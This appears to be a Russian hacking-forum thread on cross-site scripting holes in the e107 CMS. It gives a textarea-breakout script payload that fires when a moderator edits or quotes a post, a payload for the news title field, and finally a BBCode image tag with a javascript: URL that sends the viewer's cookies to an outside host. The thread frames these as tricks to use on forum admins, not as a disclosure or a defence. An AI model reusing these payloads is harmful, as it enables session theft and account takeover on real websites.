Хай! Вот выкладывал на одном форуме e107 HTML код, потом решил отредактировать, нажал, и увидел XSS При цитировании или редактировании сообщения, фильтрации нет Чё я имею в виду? Прём на e107 и пишем Code: </textarea><script>alert()</script> и при нажатии на "Редактировать" или "Цитировать" выдаётся алерт, тоесть можно написать сообщение, и матернуться в нём, и админ или модер обязательно нжмут на "Редактировать"
Так же есть уязвимость в добавить новость при вставке в тема или заголовок (точно не помню как правильно ) <scrip*t>alert(*)</scrip*t> выдаётся алерт тестировалось на локалхосте с последней версией счкачаной вчера
HTML по дефолту разрешен админу. Обычным пользователям - нет. Потому на локалеке и катит. вот ещё нашёл. правда же примитив? =) [im*g]javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/im*g]
